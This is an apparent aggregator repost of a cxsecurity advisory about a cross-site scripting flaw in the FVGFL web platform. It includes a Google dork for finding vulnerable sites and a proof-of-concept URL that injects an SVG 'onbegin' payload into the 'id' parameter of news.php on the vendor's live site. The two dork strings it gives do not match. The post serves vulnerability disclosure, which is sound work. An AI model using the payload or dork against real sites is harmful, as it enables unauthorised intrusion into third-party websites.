FVGFL - Cross Site Scripting Vulnerability (XSS)
FVGFL平台存在跨站脚本(XSS)漏洞,攻击者可通过特定参数注入恶意代码进行攻击。该漏洞由Mahdi Karimi发现,并提供了验证概念和演示链接。 2025-9-27 11:24:56 Author: cxsecurity.com(查看原文) 阅读量:75 收藏
FVGFL平台存在跨站脚本(XSS)漏洞,攻击者可通过特定参数注入恶意代码进行攻击。该漏洞由Mahdi Karimi发现,并提供了验证概念和演示链接。 2025-9-27 11:24:56 Author: cxsecurity.com(查看原文) 阅读量:75 收藏
**************************** #Exploit Title: FVGFL - Cross Site Scripting Vulnerability (XSS) #Date: 2025-09-18 #Exploit Author: Mahdi Karimi #Vendor Homepage: https://www.fvgfl.com #Google Dork: "Powered by Web FVGFL" #Tested On: Ubuntu 25.04 Proof of Concept: Search google Dork: "Powered by Web Partner" Demo: https://www.fvgfl.com/news.php?id=22%27%3E%3Csvg%3E%3Cset+onbegin%3Dalert%281%29+attributeName%3Dx+to%3D0%3E ************************************************** #Discovered by: Mahdi Karimi #Email : [email protected] **************************************************
文章来源: https://cxsecurity.com/issue/WLB-2025090013
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh